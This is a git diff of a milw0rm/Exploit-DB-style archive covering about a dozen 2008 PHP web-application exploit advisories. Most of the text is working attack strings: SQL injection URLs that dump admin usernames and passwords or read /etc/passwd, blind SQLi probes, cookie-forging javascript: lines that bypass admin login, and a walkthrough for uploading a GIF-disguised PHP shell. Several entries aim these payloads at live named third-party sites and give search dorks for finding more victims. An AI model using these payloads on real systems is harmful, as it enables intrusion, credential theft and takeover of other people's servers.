@@ -1,32 +1,31 @@
-
-Classifieds Blaster ( id ) Remote SQL Injection Vulnerability
-___________________________________
-
-Author: Hussin X
-
-Home :  www.IQ-TY.com  & www.TrYaG.cc
-
-___________________________________
-
-script    : http://www.yourfreeworld.com/script/classifiedsblaster.php
-
-DorK   : :)
-
-Exploit :
-_______
-
-tr.php?id=-1+union+select+1,2,3,concat(0x3a,Username,0x3a,Password),5,6,7,8,9,10,11,12,13+from+adminsettings--
-
-
-Demo :
-_______
-
-http://www.downlinegoldmine.com/classifiedsblaster/tr.php?id=-1+union+select+1,2,3,concat(0x3a,Username,0x3a,Password),5,6,7,8,9,10,11,12,13+from+adminsettings--
-
-
-
-
-
-Greetz : All my freind
-
-# milw0rm.com [2008-11-01]
+Classifieds Blaster ( id ) Remote SQL Injection Vulnerability
+___________________________________
+
+Author: Hussin X
+
+Home :  www.IQ-TY.com  & www.TrYaG.cc
+
+___________________________________
+
+script    : http://www.yourfreeworld.com/script/classifiedsblaster.php
+
+DorK   : :)
+
+Exploit :
+_______
+
+tr.php?id=-1+union+select+1,2,3,concat(0x3a,Username,0x3a,Password),5,6,7,8,9,10,11,12,13+from+adminsettings--
+
+
+Demo :
+_______
+
+http://www.downlinegoldmine.com/classifiedsblaster/tr.php?id=-1+union+select+1,2,3,concat(0x3a,Username,0x3a,Password),5,6,7,8,9,10,11,12,13+from+adminsettings--
+
+
+
+
+
+Greetz : All my freind
+
+# milw0rm.com [2008-11-01]
diff --git a/platforms/php/webapps/6945.txt b/platforms/php/webapps/6945.txt
index 8b44377fc..7900b01bb 100755
--- a/platforms/php/webapps/6945.txt
+++ b/platforms/php/webapps/6945.txt
@@ -1,33 +1,32 @@
-
-Classifieds (category) Remote SQL Injection Vulnerability
-___________________________________
-
-Author: Hussin X
-
-Home :  www.IQ-TY.com  & www.TrYaG.cc
-
-___________________________________
-
-script    : http://www.yourfreeworld.com/script/classifieds.php
-
-DorK   :  inurl:classifieds/view.php?category=
-
-Exploit :
-_______
-
-view.php?category=-2+UNION+SELECT+1,concat(0x3a,Username,0x3a,Password),3+from+adminsettings--
-
-
-
-Demo :
-_______
-http://www.downlinegoldmine.com/classifieds/view.php?category=-2+UNION+SELECT+1,concat(0x3a,Username,0x3a,Password),3+from+adminsettings--
-
-
-
-
-
-
-Greetz : All my freind
-
-# milw0rm.com [2008-11-01]
+Classifieds (category) Remote SQL Injection Vulnerability
+___________________________________
+
+Author: Hussin X
+
+Home :  www.IQ-TY.com  & www.TrYaG.cc
+
+___________________________________
+
+script    : http://www.yourfreeworld.com/script/classifieds.php
+
+DorK   :  inurl:classifieds/view.php?category=
+
+Exploit :
+_______
+
+view.php?category=-2+UNION+SELECT+1,concat(0x3a,Username,0x3a,Password),3+from+adminsettings--
+
+
+
+Demo :
+_______
+http://www.downlinegoldmine.com/classifieds/view.php?category=-2+UNION+SELECT+1,concat(0x3a,Username,0x3a,Password),3+from+adminsettings--
+
+
+
+
+
+
+Greetz : All my freind
+
+# milw0rm.com [2008-11-01]
diff --git a/platforms/php/webapps/6946.txt b/platforms/php/webapps/6946.txt
index 3092110f6..70b95f631 100755
--- a/platforms/php/webapps/6946.txt
+++ b/platforms/php/webapps/6946.txt
@@ -1,32 +1,31 @@
-
-Downline Goldmine Builder (tr.php id) Remote SQL Injection Vulnerability
-___________________________________
-
-Author: Hussin X
-
-Home :  www.IQ-TY.com  & www.TrYaG.cc
-
-___________________________________
-
-script    :http://www.downlinegoldmine.com/
-
-DorK   :inurl:tr.php?id=
-
-Exploit :
-_______
-
-tr.php?id=-1+union+select+1,2,3,concat_ws(0x3a,user(),version(),database()),5,6,7,8,9,10,11,12,13--
-
-
-
-
-
-Demo :
-_______
-
-http://www.downlinegoldmine.com/downlinebuilder/tr.php?id=-1+union+select+1,2,3,concat_ws(0x3a,user(),version(),database()),5,6,7,8,9,10,11,12,13--
-
-
-Greetz : All my freind
-
-# milw0rm.com [2008-11-01]
+Downline Goldmine Builder (tr.php id) Remote SQL Injection Vulnerability
+___________________________________
+
+Author: Hussin X
+
+Home :  www.IQ-TY.com  & www.TrYaG.cc
+
+___________________________________
+
+script    :http://www.downlinegoldmine.com/
+
+DorK   :inurl:tr.php?id=
+
+Exploit :
+_______
+
+tr.php?id=-1+union+select+1,2,3,concat_ws(0x3a,user(),version(),database()),5,6,7,8,9,10,11,12,13--
+
+
+
+
+
+Demo :
+_______
+
+http://www.downlinegoldmine.com/downlinebuilder/tr.php?id=-1+union+select+1,2,3,concat_ws(0x3a,user(),version(),database()),5,6,7,8,9,10,11,12,13--
+
+
+Greetz : All my freind
+
+# milw0rm.com [2008-11-01]
diff --git a/platforms/php/webapps/6947.txt b/platforms/php/webapps/6947.txt
index 0e68ab8cc..de604289b 100755
--- a/platforms/php/webapps/6947.txt
+++ b/platforms/php/webapps/6947.txt
@@ -1,33 +1,32 @@
-
-Category Addon (tr.php id) Remote SQL Injection Vulnerability
-___________________________________
-
-Author: Hussin X
-
-Home :  www.IQ-TY.com  & www.TrYaG.cc
-
-___________________________________
-
-script    : http://www.downlinegoldmine.com/
-
-DorK   :  inurl:tr.php?id=
-
-Exploit :
-_______
-
-tr.php?id=-1+union+select+1,2,3,concat_ws(0x3a,user(),version(),database()),5,6,7,8,9,10,11,12,13--
-
-
-
-Demo :
-_______
-http://www.downlinegoldmine.com/categoryaddon/tr.php?id=-1+union+select+1,2,3,concat_ws(0x3a,user(),version(),database()),5,6,7,8,9,10,11,12,13--
-
-
-
-
-
-
-Greetz : All my freind
-
-# milw0rm.com [2008-11-01]
+Category Addon (tr.php id) Remote SQL Injection Vulnerability
+___________________________________
+
+Author: Hussin X
+
+Home :  www.IQ-TY.com  & www.TrYaG.cc
+
+___________________________________
+
+script    : http://www.downlinegoldmine.com/
+
+DorK   :  inurl:tr.php?id=
+
+Exploit :
+_______
+
+tr.php?id=-1+union+select+1,2,3,concat_ws(0x3a,user(),version(),database()),5,6,7,8,9,10,11,12,13--
+
+
+
+Demo :
+_______
+http://www.downlinegoldmine.com/categoryaddon/tr.php?id=-1+union+select+1,2,3,concat_ws(0x3a,user(),version(),database()),5,6,7,8,9,10,11,12,13--
+
+
+
+
+
+
+Greetz : All my freind
+
+# milw0rm.com [2008-11-01]
diff --git a/platforms/php/webapps/6948.txt b/platforms/php/webapps/6948.txt
index 4b790e7b0..f8bddeeab 100755
--- a/platforms/php/webapps/6948.txt
+++ b/platforms/php/webapps/6948.txt
@@ -1,32 +1,31 @@
-
-Classifieds Hosting( id ) Remote SQL Injection Vulnerability
-___________________________________
-
-Author: Hussin X
-
-Home :  www.IQ-TY.com  & www.TrYaG.cc
-
-___________________________________
-
-script    : http://www.yourfreeworld.com/script/classifiedshosting.php
-
-DorK   : inurl:tr.php?id= Hosting
-
-Exploit :
-_______
-
-tr.php?id=-1+union+select+1,2,3,concat(0x3a,Username,0x3a,Password),5,6,7,8,9,10,11,12,13,14+from+adminsettings--
-
-
-Demo :
-_______
-
-http://www.classyfied-ads.com/tr.php?id=-1+union+select+1,2,3,concat(0x3a,Username,0x3a,Password),5,6,7,8,9,10,11,12,13,14+from+adminsettings--
-
-
-
-
-
-Greetz : All my freind
-
-# milw0rm.com [2008-11-01]
+Classifieds Hosting( id ) Remote SQL Injection Vulnerability
+___________________________________
+
+Author: Hussin X
+
+Home :  www.IQ-TY.com  & www.TrYaG.cc
+
+___________________________________
+
+script    : http://www.yourfreeworld.com/script/classifiedshosting.php
+
+DorK   : inurl:tr.php?id= Hosting
+
+Exploit :
+_______
+
+tr.php?id=-1+union+select+1,2,3,concat(0x3a,Username,0x3a,Password),5,6,7,8,9,10,11,12,13,14+from+adminsettings--
+
+
+Demo :
+_______
+
+http://www.classyfied-ads.com/tr.php?id=-1+union+select+1,2,3,concat(0x3a,Username,0x3a,Password),5,6,7,8,9,10,11,12,13,14+from+adminsettings--
+
+
+
+
+
+Greetz : All my freind
+
+# milw0rm.com [2008-11-01]
diff --git a/platforms/php/webapps/6949.txt b/platforms/php/webapps/6949.txt
index 71cbec10d..3cace5eda 100755
--- a/platforms/php/webapps/6949.txt
+++ b/platforms/php/webapps/6949.txt
@@ -1,32 +1,32 @@
-URL Rotator ( id ) Remote SQL Injection Vulnerability
-___________________________________
-
-Author: Hussin X
-
-Home :  www.IQ-TY.com  & www.TrYaG.cc
-
-___________________________________
-
-script    : http://www.yourfreeworld.com/script/urlrotator.php
-
-DorK   : Copyright ©  Rotator 2008
-
-Exploit :
-_______
-
-tr.php?id=-1+union+select+1,2,3,concat(0x3a,Username,0x3a,Password),5,6,7,8,9,10,11,12,13+from+adminsettings--
-
-
-Demo :
-_______
-
-http://www.safelistadtrading.com/urlrotator/tr.php?id=-1+union+select+1,2,3,concat(0x3a,Username,0x3a,Password),5,6,7,8,9,10,11,12,13+from+adminsettings--
-
-
-
-
-
-
-Greetz : All my freind
-
-# milw0rm.com [2008-11-01]
+URL Rotator ( id ) Remote SQL Injection Vulnerability
+___________________________________
+
+Author: Hussin X
+
+Home :  www.IQ-TY.com  & www.TrYaG.cc
+
+___________________________________
+
+script    : http://www.yourfreeworld.com/script/urlrotator.php
+
+DorK   : Copyright ©  Rotator 2008
+
+Exploit :
+_______
+
+tr.php?id=-1+union+select+1,2,3,concat(0x3a,Username,0x3a,Password),5,6,7,8,9,10,11,12,13+from+adminsettings--
+
+
+Demo :
+_______
+
+http://www.safelistadtrading.com/urlrotator/tr.php?id=-1+union+select+1,2,3,concat(0x3a,Username,0x3a,Password),5,6,7,8,9,10,11,12,13+from+adminsettings--
+
+
+
+
+
+
+Greetz : All my freind
+
+# milw0rm.com [2008-11-01]
diff --git a/platforms/php/webapps/6951.txt b/platforms/php/webapps/6951.txt
index 98c087b5b..44f238097 100755
--- a/platforms/php/webapps/6951.txt
+++ b/platforms/php/webapps/6951.txt
@@ -1,32 +1,31 @@
-
-newdownlinebuilder (tr.php id) Remote SQL Injection Vulnerability
-___________________________________
-
-Author: Hussin X
-
-Home :  www.IQ-TY.com  & www.TrYaG.cc
-
-___________________________________
-
-script    : http://www.downlinegoldmine.com/
-
-DorK   :  inurl:tr.php?id=
-
-Exploit :
-_______
-
-tr.php?id=-1+union+select+1,2,3,concat_ws(0x3a,user(),version(),database()),5,6,7,8,9,10,11,12,13--
-
-
-Demo :
-_______
-
-http://www.downlinegoldmine.com/newdownlinebuilder/tr.php?id=-1+union+select+1,2,3,concat_ws(0x3a,user(),version(),database()),5,6,7,8,9,10,11,12,13--
-
-
-
-
-
-Greetz : All my freind
-
-# milw0rm.com [2008-11-02]
+newdownlinebuilder (tr.php id) Remote SQL Injection Vulnerability
+___________________________________
+
+Author: Hussin X
+
+Home :  www.IQ-TY.com  & www.TrYaG.cc
+
+___________________________________
+
+script    : http://www.downlinegoldmine.com/
+
+DorK   :  inurl:tr.php?id=
+
+Exploit :
+_______
+
+tr.php?id=-1+union+select+1,2,3,concat_ws(0x3a,user(),version(),database()),5,6,7,8,9,10,11,12,13--
+
+
+Demo :
+_______
+
+http://www.downlinegoldmine.com/newdownlinebuilder/tr.php?id=-1+union+select+1,2,3,concat_ws(0x3a,user(),version(),database()),5,6,7,8,9,10,11,12,13--
+
+
+
+
+
+Greetz : All my freind
+
+# milw0rm.com [2008-11-02]
diff --git a/platforms/php/webapps/6952.txt b/platforms/php/webapps/6952.txt
index b5b0523a0..8b4e3c3f0 100755
--- a/platforms/php/webapps/6952.txt
+++ b/platforms/php/webapps/6952.txt
@@ -1,27 +1,26 @@
-
-Shopping Cart ( index.php c )  Blind SQL Injection Vulnerability
-___________________________________
-
-Author: Hussin X
-
-Home :  www.IQ-TY.com  & www.TrYaG.cc
-
-___________________________________
-
-script    :http://www.yourfreeworld.com/script/affiliateshoppingcart.php
-
-Demo :
-_______
-true & false
-
-http://www.downlinegoldmine.com/shopcart/index.php?c=12+and+substring(@@version,1,1)=4
-http://www.downlinegoldmine.com/shopcart/index.php?c=12+and+substring(@@version,1,1)=5
-
-
-
-
-Greetz : All my freind
-
-Im TrYaGi
-
-# milw0rm.com [2008-11-02]
+Shopping Cart ( index.php c )  Blind SQL Injection Vulnerability
+___________________________________
+
+Author: Hussin X
+
+Home :  www.IQ-TY.com  & www.TrYaG.cc
+
+___________________________________
+
+script    :http://www.yourfreeworld.com/script/affiliateshoppingcart.php
+
+Demo :
+_______
+true & false
+
+http://www.downlinegoldmine.com/shopcart/index.php?c=12+and+substring(@@version,1,1)=4
+http://www.downlinegoldmine.com/shopcart/index.php?c=12+and+substring(@@version,1,1)=5
+
+
+
+
+Greetz : All my freind
+
+Im TrYaGi
+
+# milw0rm.com [2008-11-02]
diff --git a/platforms/php/webapps/6953.txt b/platforms/php/webapps/6953.txt
index d40a9d660..c3e1087e8 100755
--- a/platforms/php/webapps/6953.txt
+++ b/platforms/php/webapps/6953.txt
@@ -1,22 +1,22 @@
-# Maran PHP Shop (prod.php cat) SQL Injection Vulnerability
-# url: http://www.maran.pamil-visions.com/maranshop.php
-#
-# Author: JosS
-# mail: sys-project[at]hotmail[dot]com
-# site: http://spanish-hackers.com
-# team: Spanish Hackers Team - [SHT]
-#
-# This was written for educational purpose. Use it at your own risk.
-# Author will be not responsible for any damage.
-
-PoC: /prod.php?cat=7['SQL]
-ExP: /prod.php?cat=7+and+1=2++union+all+select+database()--
-
-live demo:
-http://www.heimanis.lv/prod.php?cat=7+and+1=2++union+all+select+database()--
-
-output:~$ latvello_heimanis
-
-Hack0wn :D
-
-# milw0rm.com [2008-11-02]
+# Maran PHP Shop (prod.php cat) SQL Injection Vulnerability
+# url: http://www.maran.pamil-visions.com/maranshop.php
+#
+# Author: JosS
+# mail: sys-project[at]hotmail[dot]com
+# site: http://spanish-hackers.com
+# team: Spanish Hackers Team - [SHT]
+#
+# This was written for educational purpose. Use it at your own risk.
+# Author will be not responsible for any damage.
+
+PoC: /prod.php?cat=7['SQL]
+ExP: /prod.php?cat=7+and+1=2++union+all+select+database()--
+
+live demo:
+http://www.heimanis.lv/prod.php?cat=7+and+1=2++union+all+select+database()--
+
+output:~$ latvello_heimanis
+
+Hack0wn :D
+
+# milw0rm.com [2008-11-02]
diff --git a/platforms/php/webapps/6954.txt b/platforms/php/webapps/6954.txt
index 3e20bee8d..41aa351a3 100755
--- a/platforms/php/webapps/6954.txt
+++ b/platforms/php/webapps/6954.txt
@@ -1,25 +1,25 @@
-# Maran PHP Shop (admin.php) Insecure Cookie Handling Vulnerability
-# url: http://www.maran.pamil-visions.com/maranshop.php
-#
-# Author: JosS
-# mail: sys-project[at]hotmail[dot]com
-# site: http://spanish-hackers.com
-# team: Spanish Hackers Team - [SHT]
-#
-# This was written for educational purpose. Use it at your own risk.
-# Author will be not responsible for any damage.
-
-vuln file: /admin.php
-vuln code:
-login here";exit;}
-//echo $_COOKIE['user'];
-?>
-
-exploit:
-javascript:document.cookie = "user=demo; path=/";
-
-Hack0wn :D
-
-# milw0rm.com [2008-11-02]
+# Maran PHP Shop (admin.php) Insecure Cookie Handling Vulnerability
+# url: http://www.maran.pamil-visions.com/maranshop.php
+#
+# Author: JosS
+# mail: sys-project[at]hotmail[dot]com
+# site: http://spanish-hackers.com
+# team: Spanish Hackers Team - [SHT]
+#
+# This was written for educational purpose. Use it at your own risk.
+# Author will be not responsible for any damage.
+
+vuln file: /admin.php
+vuln code:
+login here";exit;}
+//echo $_COOKIE['user'];
+?>
+
+exploit:
+javascript:document.cookie = "user=demo; path=/";
+
+Hack0wn :D
+
+# milw0rm.com [2008-11-02]
diff --git a/platforms/php/webapps/6955.txt b/platforms/php/webapps/6955.txt
index 2be67a5b1..3fca10f1c 100755
--- a/platforms/php/webapps/6955.txt
+++ b/platforms/php/webapps/6955.txt
@@ -1,57 +1,57 @@
-[~] Joovili Script Insecure Cookie Handling Vulnerability
-[~]
-[~] version: 3.1.4 
-[~]
-[~] ----------------------------------------------------------
-[~] Discovered By: ZoRLu
-[~]
-[~] Date: 02.11.2008
-[~]
-[~] Home: www.z0rlu.blogspot.com
-[~]
-[~] contact: trt-turk@hotmail.com
-[~]
-[~] N0T: YALNIZLIK, YiTiRDi ANLAMINI YALNIZLIGIMDA : ( (
-[~] 
-[~] N0T: a.q kpss : ) )
-[~]
-[~] ----------------------------------------------------------
-
-demo admin login:
-
-http://demo.joovili.com/admin
-
-demo user login:
-
-http://demo.joovili.com/
-
-demo staff login:
-
-http://demo.joovili.com/staff/
-
-
-exploit for user:
-
-javascript:document.cookie = "session_id=real_id; path=/"; document.cookie = "session_logged_in=true; path=/"; document.cookie = "session_username=real_user_name; path=/"; 
-
-
-for demo user:
-
-javascript:document.cookie = "session_id=304; path=/"; document.cookie = "session_logged_in=true; path=/"; document.cookie = "session_username=demo; path=/";
-
-for demo admin:
-
-javascript:document.cookie = "session_admin_id=1; path=/"; document.cookie = "session_admin_username=admin; path=/"; document.cookie = "session_admin=true; path=/";
-
-for demo staff:
-
-javascript:document.cookie = "session_staff_id=3; path=/"; document.cookie = "session_staff_username=staff; path=/"; document.cookie = "session_staff=true; path=/";
-
-[~]----------------------------------------------------------------------
-[~] Greetz tO: str0ke & all Muslim HaCkeRs
-[~]
-[~] yildirimordulari.org  &  darkc0de.com
-[~]
-[~]----------------------------------------------------------------------
-
-# milw0rm.com [2008-11-02]
+[~] Joovili Script Insecure Cookie Handling Vulnerability
+[~]
+[~] version: 3.1.4 
+[~]
+[~] ----------------------------------------------------------
+[~] Discovered By: ZoRLu
+[~]
+[~] Date: 02.11.2008
+[~]
+[~] Home: www.z0rlu.blogspot.com
+[~]
+[~] contact: trt-turk@hotmail.com
+[~]
+[~] N0T: YALNIZLIK, YiTiRDi ANLAMINI YALNIZLIGIMDA : ( (
+[~] 
+[~] N0T: a.q kpss : ) )
+[~]
+[~] ----------------------------------------------------------
+
+demo admin login:
+
+http://demo.joovili.com/admin
+
+demo user login:
+
+http://demo.joovili.com/
+
+demo staff login:
+
+http://demo.joovili.com/staff/
+
+
+exploit for user:
+
+javascript:document.cookie = "session_id=real_id; path=/"; document.cookie = "session_logged_in=true; path=/"; document.cookie = "session_username=real_user_name; path=/"; 
+
+
+for demo user:
+
+javascript:document.cookie = "session_id=304; path=/"; document.cookie = "session_logged_in=true; path=/"; document.cookie = "session_username=demo; path=/";
+
+for demo admin:
+
+javascript:document.cookie = "session_admin_id=1; path=/"; document.cookie = "session_admin_username=admin; path=/"; document.cookie = "session_admin=true; path=/";
+
+for demo staff:
+
+javascript:document.cookie = "session_staff_id=3; path=/"; document.cookie = "session_staff_username=staff; path=/"; document.cookie = "session_staff=true; path=/";
+
+[~]----------------------------------------------------------------------
+[~] Greetz tO: str0ke & all Muslim HaCkeRs
+[~]
+[~] yildirimordulari.org  &  darkc0de.com
+[~]
+[~]----------------------------------------------------------------------
+
+# milw0rm.com [2008-11-02]
diff --git a/platforms/php/webapps/6956.txt b/platforms/php/webapps/6956.txt
index 1a9f47881..27f5fe866 100755
--- a/platforms/php/webapps/6956.txt
+++ b/platforms/php/webapps/6956.txt
@@ -1,133 +1,133 @@
-[~] Apartment Search Script Multiple Remote Vuln.
-[~]
-[~] Remote File Upload & XSS
-[~]
-[~] ----------------------------------------------------------
-[~] Discovered By: ZoRLu
-[~]
-[~] Date: 02.11.2008
-[~]
-[~] Home: www.z0rlu.blogspot.com
-[~]
-[~] contact: trt-turk@hotmail.com
-[~]
-[~] N0T: YALNIZLIK, YiTiRDi ANLAMINI YALNIZLIGIMDA : ( (
-[~] 
-[~] dork: allinurl:"listtest.php?r=" ( cok site var sömürün : ) )
-[~]
-[~] ----------------------------------------------------------
-
-exploit:
-
-http://localhost/script_path/Member_Admin/logo/[id]your_shell.php
-
-XSS
-
-http://localhost/script_path/listtest.php?r=">
-
-example 1 (demo):
-
-http://www.downlinegoldmine.com/apartment/Member_Admin/logo/b50f9cbff100ae4e8a581a9f1a8shell.php
-
-example 2:
-
-http://www.apt.cc/Member_Admin/logo/cca55760b985b02c1b9d7fac606shell.php
-
-XSS example:
-
-http://www.apt.cc/listtest.php?r=">
-
----------------------------------------------------------------------------
-
-you must have a minimal shell ( example 40 kb ) (kucuk bir shell in olmalI )
-
-and you add this code your shell to head 
-
-GIF89a; (en uste bu kodu ekle )
-
-example your_shell.php:
-
-GIF89a;
-
-
-and save your_sheell.php ( isim ver ve kaydet )
-
-----------------------------------------------------------------------------
-
-you must register to site ( direckt register link: http://localhost/script_path/registerlandlord.php ) ( siteye uye ol )
-
-and login ( direckt link: http://localhost/script_path/Member_Admin/index.php ) ( giris yap )
-
-after edit your banner ( direckt link: http://localhost/script_path/Member_Admin/editimage.php?clientid=[MemberAdminPass] )
-
-or first click "Edit Account Info" after click "Your Logo" Edit button ( "Edit Account Info" yazýsýna tIkla sonra da edit butonuna tIkla )
-
-and open new page. you click gozat button and select your_sheell.php ( acIlan yeni sayfada senin hazIr shell i upload et )
-
-after click to submit button. you should see "Your image will be review." ( "Your image will be review." bu yazIyI gormelisin )
-
-if you see "Your image will be review." your shell upload succesfull. ( gorduysen yukleme basarIlI )
-
-after repeat click to "Edit Account Info" and open page. your logo right click and properties select this link copy
-
-after paste your explorer go your_shell.php ( sonra yine "Edit Account Info" yazIsIna Týkla 
-
-acIlan sayfada logonun ustunde sag tIkla ozellikleri Týkla linki kopyala sonrada shelle ulas )
-
-
-your_shell.php
-
-http://localhost/script_path/Member_Admin/logo/[id]your_shell.php
-
--------------------------------------------------------------------------------
-
-example 1 (demo):
-
-http://www.downlinegoldmine.com/apartment/Member_Admin/index.php 
-
-email: zorlu@w.cn
-
-password: 123456
-
-or direckt going: http://www.downlinegoldmine.com/apartment/Member_Admin/login.php?c=4806666
-
-edit logo: http://www.downlinegoldmine.com/apartment/Member_Admin/editimage.php?clientid=4806666
-
-and shell.php
-
-http://www.downlinegoldmine.com/apartment/Member_Admin/logo/b50f9cbff100ae4e8a581a9f1a8shell.php
-
-
-example 2:
-
-http://www.apt.cc/Member_Admin/index.php
-
-email: zorlu@w.cn
-
-password: 123456
-
-or direckt going: http://www.apt.cc/Member_Admin/login.php?c=4871187
-
-edit logo: http://www.apt.cc/Member_Admin/editimage.php?clientid=4871187
-
-and shell.php
-
-http://www.apt.cc/Member_Admin/logo/cca55760b985b02c1b9d7fac606shell.php
-
-
-[~]----------------------------------------------------------------------
-[~] Greetz tO: str0ke & all Muslim HaCkeRs
-[~]
-[~] yildirimordulari.org  &  darkc0de.com
-[~]
-[~]----------------------------------------------------------------------
-
-# milw0rm.com [2008-11-02]
+[~] Apartment Search Script Multiple Remote Vuln.
+[~]
+[~] Remote File Upload & XSS
+[~]
+[~] ----------------------------------------------------------
+[~] Discovered By: ZoRLu
+[~]
+[~] Date: 02.11.2008
+[~]
+[~] Home: www.z0rlu.blogspot.com
+[~]
+[~] contact: trt-turk@hotmail.com
+[~]
+[~] N0T: YALNIZLIK, YiTiRDi ANLAMINI YALNIZLIGIMDA : ( (
+[~] 
+[~] dork: allinurl:"listtest.php?r=" ( cok site var sömürün : ) )
+[~]
+[~] ----------------------------------------------------------
+
+exploit:
+
+http://localhost/script_path/Member_Admin/logo/[id]your_shell.php
+
+XSS
+
+http://localhost/script_path/listtest.php?r=">
+
+example 1 (demo):
+
+http://www.downlinegoldmine.com/apartment/Member_Admin/logo/b50f9cbff100ae4e8a581a9f1a8shell.php
+
+example 2:
+
+http://www.apt.cc/Member_Admin/logo/cca55760b985b02c1b9d7fac606shell.php
+
+XSS example:
+
+http://www.apt.cc/listtest.php?r=">
+
+---------------------------------------------------------------------------
+
+you must have a minimal shell ( example 40 kb ) (kucuk bir shell in olmalI )
+
+and you add this code your shell to head 
+
+GIF89a; (en uste bu kodu ekle )
+
+example your_shell.php:
+
+GIF89a;
+
+
+and save your_sheell.php ( isim ver ve kaydet )
+
+----------------------------------------------------------------------------
+
+you must register to site ( direckt register link: http://localhost/script_path/registerlandlord.php ) ( siteye uye ol )
+
+and login ( direckt link: http://localhost/script_path/Member_Admin/index.php ) ( giris yap )
+
+after edit your banner ( direckt link: http://localhost/script_path/Member_Admin/editimage.php?clientid=[MemberAdminPass] )
+
+or first click "Edit Account Info" after click "Your Logo" Edit button ( "Edit Account Info" yazýsýna tIkla sonra da edit butonuna tIkla )
+
+and open new page. you click gozat button and select your_sheell.php ( acIlan yeni sayfada senin hazIr shell i upload et )
+
+after click to submit button. you should see "Your image will be review." ( "Your image will be review." bu yazIyI gormelisin )
+
+if you see "Your image will be review." your shell upload succesfull. ( gorduysen yukleme basarIlI )
+
+after repeat click to "Edit Account Info" and open page. your logo right click and properties select this link copy
+
+after paste your explorer go your_shell.php ( sonra yine "Edit Account Info" yazIsIna Týkla 
+
+acIlan sayfada logonun ustunde sag tIkla ozellikleri Týkla linki kopyala sonrada shelle ulas )
+
+
+your_shell.php
+
+http://localhost/script_path/Member_Admin/logo/[id]your_shell.php
+
+-------------------------------------------------------------------------------
+
+example 1 (demo):
+
+http://www.downlinegoldmine.com/apartment/Member_Admin/index.php 
+
+email: zorlu@w.cn
+
+password: 123456
+
+or direckt going: http://www.downlinegoldmine.com/apartment/Member_Admin/login.php?c=4806666
+
+edit logo: http://www.downlinegoldmine.com/apartment/Member_Admin/editimage.php?clientid=4806666
+
+and shell.php
+
+http://www.downlinegoldmine.com/apartment/Member_Admin/logo/b50f9cbff100ae4e8a581a9f1a8shell.php
+
+
+example 2:
+
+http://www.apt.cc/Member_Admin/index.php
+
+email: zorlu@w.cn
+
+password: 123456
+
+or direckt going: http://www.apt.cc/Member_Admin/login.php?c=4871187
+
+edit logo: http://www.apt.cc/Member_Admin/editimage.php?clientid=4871187
+
+and shell.php
+
+http://www.apt.cc/Member_Admin/logo/cca55760b985b02c1b9d7fac606shell.php
+
+
+[~]----------------------------------------------------------------------
+[~] Greetz tO: str0ke & all Muslim HaCkeRs
+[~]
+[~] yildirimordulari.org  &  darkc0de.com
+[~]
+[~]----------------------------------------------------------------------
+
+# milw0rm.com [2008-11-02]
diff --git a/platforms/php/webapps/6957.txt b/platforms/php/webapps/6957.txt
index d0839df93..ee92700fa 100755
--- a/platforms/php/webapps/6957.txt
+++ b/platforms/php/webapps/6957.txt
@@ -1,20 +1,19 @@
-
-# -----------------------------------------------------------------
-# NetRisk <= 2.0 (XSS/SQL Injection) Remote Vulnerabilities
-# -----------------------------------------------------------------
-# Discovered By StAkeR aka athos
-# Download On http://downloads.sourceforge.net/netrisk
-# Works Regardless Of php.ini Settings!
-# -----------------------------------------------------------------
-
-# Cross Site Scripting 	
-# index.php?error=
-
-# Remote SQL Injection 
-# index.php?p=profile&id=1+union+all+select+0,0,concat(login,0x3a,password),0,0,0,0,0,0,0,0,0,0,0,0+from+netrisk_users+where+id=1/*
-# index.php?p=profile&id=1+union+all+select+0,0,load_file(0x2F6574632F706173737764),0,0,0,0,0,0,0,0,0,0,0,0/*
-
-# Remote Blind SQL Injection
-# index.php?p=game&id=1 and ascii(substring((select password from netrisk_users where id=1),1,1))=[ascii]/*
-
-# milw0rm.com [2008-11-02]
+# -----------------------------------------------------------------
+# NetRisk <= 2.0 (XSS/SQL Injection) Remote Vulnerabilities
+# -----------------------------------------------------------------
+# Discovered By StAkeR aka athos
+# Download On http://downloads.sourceforge.net/netrisk
+# Works Regardless Of php.ini Settings!
+# -----------------------------------------------------------------
+
+# Cross Site Scripting 	
+# index.php?error=
+
+# Remote SQL Injection 
+# index.php?p=profile&id=1+union+all+select+0,0,concat(login,0x3a,password),0,0,0,0,0,0,0,0,0,0,0,0+from+netrisk_users+where+id=1/*
+# index.php?p=profile&id=1+union+all+select+0,0,load_file(0x2F6574632F706173737764),0,0,0,0,0,0,0,0,0,0,0,0/*
+
+# Remote Blind SQL Injection
+# index.php?p=game&id=1 and ascii(substring((select password from netrisk_users where id=1),1,1))=[ascii]/*
+
+# milw0rm.com [2008-11-02]
diff --git a/platforms/php/webapps/6958.txt b/platforms/php/webapps/6958.txt
index 82c3d91e0..883b425c6 100755
--- a/platforms/php/webapps/6958.txt
+++ b/platforms/php/webapps/6958.txt
@@ -1,30 +1,30 @@
-[~]-------------------------------------------------------------------------------------------------------------
-
-[~] Maran PHP Shop (prodshow.php) SQL Injection Vulnerability
-[~]
-[~] http://www.maran.pamil-visions.com/maranshop.php
-[~]  
-[~] 
-[~] ------------------------------------------------------------------------------------------------------------
-[~] Bug founded by d3v1l [Avram Marius]
-[~]
-[~] Date: 12.10.2008
-[~]
-[~]
-[~] d3v1l@spoofer.com http://security-sh3ll.com
-[~]
-[~] ------------------------------------------------------------------------------------------------------------
-[~] Greetz tO ALL:-
-[~]
-[~] Security-Shell Members ( http://security-sh3ll.com/forum.php )
-[~]
-[~] milw0rm staff
-[~]-------------------------------------------------------------------------------------------------------------
-[~] Exploit :-
-[~]
-[~] http://site.com/prodshow.php?id=1 UNION SELECT 1,concat_ws(0x3a,version(),database(),user()),3,4,5,6,7
-[~] 
-[~] http://site.com/prodshow.php?id=1 UNION SELECT 1,concat(user_password,char(58),user_name),3,4,5,6,7 FROM administrators
-[~]----------------------------------------------------------------------------------------------------------------------
-
-# milw0rm.com [2008-11-02]
+[~]-------------------------------------------------------------------------------------------------------------
+
+[~] Maran PHP Shop (prodshow.php) SQL Injection Vulnerability
+[~]
+[~] http://www.maran.pamil-visions.com/maranshop.php
+[~]  
+[~] 
+[~] ------------------------------------------------------------------------------------------------------------
+[~] Bug founded by d3v1l [Avram Marius]
+[~]
+[~] Date: 12.10.2008
+[~]
+[~]
+[~] d3v1l@spoofer.com http://security-sh3ll.com
+[~]
+[~] ------------------------------------------------------------------------------------------------------------
+[~] Greetz tO ALL:-
+[~]
+[~] Security-Shell Members ( http://security-sh3ll.com/forum.php )
+[~]
+[~] milw0rm staff
+[~]-------------------------------------------------------------------------------------------------------------
+[~] Exploit :-
+[~]
